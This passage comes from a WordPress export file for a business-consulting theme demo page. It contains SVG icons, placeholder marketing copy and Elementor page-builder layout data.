		<path d="M489.129,42.371h-32.011V10c0-5.523-4.477-10-10-10s-10,4.477-10,10v38.237l-41.806,41.92    c-42.173-38.385-96.385-59.418-153.76-59.418c-61.083,0-118.511,23.787-161.703,66.979C36.657,140.91,12.87,198.338,12.87,259.421    s23.787,118.511,66.979,161.703c6.719,6.719,13.783,12.967,21.151,18.73l-55.074,55.074c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929l57.452-57.453c36.629,23.742,79.348,36.485,124.031,36.485    c44.901,0,87.818-12.868,124.566-36.833l57.801,57.801c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929    c3.905-3.905,3.906-10.237,0-14.143l-55.467-55.467c7.19-5.656,14.092-11.769,20.661-18.337    c43.192-43.192,66.979-100.62,66.979-161.703c0-34.789-7.614-68.199-22.63-99.303c-2.401-4.974-8.381-7.06-13.353-4.658    c-4.974,2.401-7.059,8.379-4.658,13.353c13.696,28.37,20.641,58.855,20.641,90.608c0,115.068-93.615,208.683-208.683,208.683    S32.867,374.49,32.867,259.421c0-115.068,93.615-208.683,208.683-208.683c52.045,0,101.242,18.958,139.627,53.59l-35.099,35.195    c-28.976-25.325-65.717-39.171-104.527-39.171c-87.711,0-159.069,71.358-159.069,159.069s71.36,159.069,159.071,159.069    s159.069-71.358,159.069-159.069c0-14.146-1.859-28.178-5.527-41.708c-6.436-23.746-18.393-45.726-34.797-64.125l42.276-42.391    c0.013-0.013,0.028-0.024,0.041-0.037c0.012-0.012,0.021-0.025,0.033-0.036l48.621-48.753h37.861c5.523,0,10-4.477,10-10    S494.652,42.371,489.129,42.371z M375.792,222.945c3.206,11.825,4.831,24.097,4.831,36.476    c0,76.683-62.386,139.069-139.069,139.069s-139.069-62.387-139.069-139.069s62.386-139.069,139.069-139.069    c33.479,0,65.202,11.779,90.375,33.362l-41.285,41.397c-13.628-10.428-30.644-16.643-49.09-16.643    c-44.637,0-80.953,36.315-80.953,80.953s36.315,80.953,80.953,80.953s80.953-36.315,80.953-80.953    c0-18.997-6.594-36.473-17.592-50.297l41.232-41.344C360.089,183.686,370.271,202.573,375.792,222.945z M235.828,264.236    c1.952,1.946,4.507,2.919,7.062,2.919c2.563,0,5.127-0.979,7.081-2.938l40.71-40.821c7.426,10.1,11.825,22.556,11.825,36.025    c0,33.609-27.343,60.953-60.953,60.953c-33.61,0-60.953-27.344-60.953-60.953s27.343-60.953,60.953-60.953    c12.935,0,24.933,4.062,34.81,10.961l-40.554,40.664C231.909,254.004,231.917,260.335,235.828,264.236z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="419.22" cy="133.64" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Strategy</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="87.43" cy="406.69" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="470.4" cy="287.44" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M354.647,212.344h-5.797h-3.761h-5.797c-4.854,0-8.802-3.948-8.802-8.802v-8.931c0.001-4.854,3.949-8.802,8.802-8.802    h17.012c3.939,0,7.145,3.204,7.145,7.144c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10c0-14.743-11.818-26.771-26.479-27.127    v-8.584c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10v8.669c-14.798,1.188-26.479,13.602-26.479,28.7v8.931    c0,15.881,12.921,28.802,28.802,28.802h5.797h3.761h5.797c4.854,0,8.802,3.948,8.802,8.801v8.932c0,4.853-3.948,8.801-8.802,8.801    h-17.012c-3.939,0-7.145-3.204-7.145-7.144c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10c0,14.744,11.819,26.771,26.479,27.127    v8.584c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-8.669c14.798-1.188,26.479-13.601,26.479-28.699v-8.932    C383.449,225.264,370.528,212.344,354.647,212.344z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M499.899,339.009c-4.115-9.319-11.613-16.479-21.112-20.159c-9.499-3.68-19.864-3.442-29.183,0.675    c-0.05,0.021-0.1,0.044-0.148,0.066l-62.989,29.048c-5.016,2.313-7.206,8.254-4.894,13.269c2.313,5.016,8.255,7.205,13.269,4.894    l62.908-29.011c4.415-1.927,9.317-2.03,13.813-0.291c4.518,1.751,8.083,5.155,10.04,9.588c1.958,4.433,2.071,9.361,0.321,13.879    c-1.751,4.519-5.155,8.084-9.588,10.041l-128.9,56.914c-20.326,8.975-43.397,8.453-63.301-1.435l-47.185-23.441    c-25.238-12.539-54.498-13.204-80.277-1.819l-0.6,0.264l-34.973-79.21l48.628-21.47c23.239-10.261,49.169-11.087,73.012-2.332    l94.885,34.845c8.475,3.112,12.992,12.594,10.069,21.135c-2.978,8.704-12.491,13.387-21.205,10.44l-73.375-24.818    c-5.233-1.77-10.907,1.037-12.677,6.269c-1.77,5.232,1.037,10.907,6.269,12.677l73.375,24.818    c3.88,1.313,7.831,1.936,11.721,1.936c15.283,0,29.606-9.62,34.816-24.848c6.413-18.746-3.501-39.553-22.099-46.382    l-94.885-34.845c-6.382-2.344-12.888-4.115-19.454-5.321v-55.277c0-54.504,44.343-98.847,98.847-98.847h36.524    c54.505,0,98.848,44.343,98.848,98.847v26.061c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-26.061    c0-57.721-41.365-105.956-96.008-116.636V72.349l25.267-43.222c1.429-2.443,1.755-5.378,0.897-8.075    c-0.858-2.697-2.817-4.905-5.394-6.076l-30.99-14.08c-2.373-1.078-5.072-1.187-7.523-0.305l-22.995,8.276l-20.396-8.153    c-2.345-0.936-4.956-0.951-7.312-0.044l-32.428,12.511c-2.698,1.041-4.813,3.2-5.801,5.919c-0.986,2.719-0.748,5.731,0.655,8.261    l24.881,44.867v30.038c-55.169,10.258-97.072,58.744-97.072,116.84v53.36c-16.52-0.156-33.022,3.199-48.53,10.046l-48.99,21.63    c-2.806-4.199-6.808-7.445-11.615-9.307c-6.172-2.392-12.907-2.236-18.938,0.427l-63.29,27.733    c-3.637,1.594-5.986,5.188-5.986,9.159V502c0,3.473,1.802,6.697,4.76,8.518c1.603,0.985,3.419,1.482,5.24,1.482    c1.542,0,3.088-0.356,4.509-1.074l122.873-62.071c5.926-2.698,10.477-7.518,12.833-13.6c1.925-4.969,2.199-10.302,0.839-15.352    l0.865-0.382c20.327-8.977,43.401-8.454,63.301,1.435l47.185,23.442c25.239,12.536,54.498,13.199,80.277,1.818l128.9-56.914    c9.319-4.114,16.479-11.612,20.159-21.111C504.252,358.692,504.013,348.328,499.899,339.009z M364.391,100.259h-2.84h-36.524    h-1.775V79.641h41.139V100.259z M301.431,27.704l18.049-6.961l20.275,8.105c2.272,0.908,4.798,0.953,7.099,0.123l22.744-8.187    l17.201,7.815l-18.146,31.04h-49.512L301.431,27.704z M137.868,430.678c-0.158,0.07-0.315,0.145-0.47,0.223L28.831,485.745    v-40.524l28.113-13.805c4.958-2.435,7.003-8.427,4.569-13.384c-2.435-4.958-8.425-7.005-13.384-4.569l-19.299,9.476V338.69    l57.329-25.122c1.575-0.694,2.97-0.352,3.661-0.084c0.689,0.268,1.951,0.951,2.647,2.528l2.292,5.19    c0.001,0.002,0.001,0.004,0.002,0.006c0.001,0.002,0.002,0.004,0.003,0.006l45.546,103.154    C141.377,426.782,140.282,429.612,137.868,430.678z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Support</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
			<h2>Looking for a First-Class Finance Firm?</h2>		
		<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz/contact-us">get in touch</a>
	        reliable & safe	        <h3>Our Strategy Development</h3>	    
						<ul>
								<li data-tab="tab-1959">Research</li>
								<li data-tab="tab-2959">aproach</li>
								<li data-tab="tab-3959">result</li>
							</ul>
				<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.</p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.</p>			
				<p>We can definitely define the provided level and range of Synergy Development Consulting as a full-cycle support. Therefore, we treat each client as an equal partner in the long term. Our team consists of talented and motivated people who are united by love to their work!</p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.</p>			
				<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.</p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.</p>			
			<a href="#">Explore More </a>
										<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home4.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home4-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px" />]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>959</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 04:03:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 04:03:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[organizational-audit]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"41c2f83","elType":"section","settings":{"padding":{"unit":"px","top":"90","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"99e32eb","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"bbf118c","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/slider2-home2.jpg","id":1317},"background_position":"center center","background_position_mobile":"center left","background_repeat":"no-repeat","background_size":"cover","background_size_tablet":"cover","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"100","isLinked":false},"padding_tablet":{"unit":"px","top":"110","right":"0","bottom":"110","left":"60","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"30","isLinked":false}},"elements":[{"id":"5e47caf","elType":"column","settings":{"_column_size":50,"_inline_size":44.63600000000000278532752417959272861480712890625,"_inline_size_tablet":70,"_inline_size_mobile":100},"elements":[{"id":"4376d3b","elType":"widget","settings":{"title":"how we help","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"bold","typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1e1f3f6","elType":"widget","settings":{"title":"Align Costs with Strategy & Focus on Growth","header_size":"h1","title_color":"#1B1D21","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bb56b1a","elType":"widget","settings":{"btn_style":"dark","text":"get in touch"},"elements":[],"widgetType":"ibutton"}],"isInner":true},{"id":"a57cea8","elType":"column","settings":{"_column_size":50,"_inline_size":55.36399999999999721467247582040727138519287109375,"_inline_size_tablet":30,"_inline_size_mobile":100},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"c25f6a6","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"95","right":"0","bottom":"130","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"95","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"2385c34","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"b25f0cc","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"subtitle_style":"is_line","stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"cf25bf5","elType":"widget","settings":{"ot_accs":[{"acc_title":"In what areas do you provide management consulting?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"cab9896"},{"acc_title":"In which countries do you provide consulting services?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"d505a0a"},{"acc_title":"How is a consulting project started and organized?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"5303f19"}],"_padding":{"unit":"px","top":"0","right":"50","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"iaccordions"}],"isInner":false},{"id":"018e51c","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"9b39923","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-4.png","id":2064},"image_size":"full","align":"left","_margin":{"unit":"px","top":"0","right":"0","bottom":"-30","left":"-30","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a1952ca","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-service-detail2.jpg","id":970},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"100","right":"0","bottom":"100","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"ec49fa5","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"1b5272a","elType":"widget","settings":{"sub":"our benefits","title":"Why Clients Choose Us","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#FFFFFF","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"2d7dbb6","elType":"section","settings":{"gap":"extended","structure":"40","layout":"full_width"},"elements":[{"id":"d6df67f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"80fa6cf","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Consulting","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":32,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bg_box":"#FFFFFF","bg_hover_box":"#55BB53","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_bg":"#55BB5333"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"a9e257f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"4ea034c","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/clock.svg","id":659},"library":"svg"},"title":"Planning","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bg_box":"#FFFFFF","bg_hover_box":"#55BB53","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_bg":"#55BB5333"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"f4ad5a2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"70ad7d9","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/aim.svg","id":660},"library":"svg"},"title":"Strategy","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bg_box":"#FFFFFF","bg_hover_box":"#55BB53","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_bg":"#55BB5333"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"2b09e55","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a5a983f","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/money.svg","id":663},"library":"svg"},"title":"Support","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"bg_box":"#FFFFFF","bg_hover_box":"#55BB53","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_bg":"#55BB5333"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"d701907","elType":"section","settings":{"gap":"extended","structure":"22","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-faq.jpg","id":571},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"52","right":"0","bottom":"55","left":"0","isLinked":false},"content_position":"middle"},"elements":[{"id":"b3a944d","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"4c35005","elType":"widget","settings":{"title":"Looking for a First-Class Finance Firm?","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":40,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"cab11a6","elType":"widget","settings":{"editor":"<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.<\/p>","text_color":"#FFFFFF","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"27d6af4","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"12e765f","elType":"widget","settings":{"align":"right","align_mobile":"left","text":"get in touch","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contact-us","is_external":"","nofollow":"","custom_attributes":""},"_padding":{"unit":"px","top":"5","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"f7ba0c1","elType":"section","settings":{"structure":"20","padding":{"unit":"px","top":"100","right":"0","bottom":"100","left":"0","isLinked":false},"gap":"extended","content_position":"bottom","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"cae27a3","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"cafb16e","elType":"widget","settings":{"sub":"reliable & safe","title":"Our Strategy Development","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"subtitle_style":"is_line","stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"ce3460e","elType":"widget","settings":{"ot_tabs":[{"tab_title":"Research","tab_content":"<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.<\/p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.<\/p>","_id":"ee4235d"},{"tab_title":"aproach","tab_content":"<p>We can definitely define the provided level and range of Synergy Development Consulting as a full-cycle support. Therefore, we treat each client as an equal partner in the long term. Our team consists of talented and motivated people who are united by love to their work!<\/p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.<\/p>","_id":"768bb7a"},{"tab_title":"result","tab_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.<\/p>","_id":"3a5c920"}],"title_space":{"unit":"px","size":0,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"40","bottom":"40","left":"0","isLinked":false},"title_width_mobile":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"itabs"},{"id":"6e6c83a","elType":"widget","settings":{"btn_style":"dark","text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false},{"id":"70eb409","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"db0c981","elType":"section","settings":{"layout":"full_width","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"padding":{"unit":"px","top":"50","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"7540ef2","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"d0b9d6d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home4.png","id":2074},"image_size":"full"},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
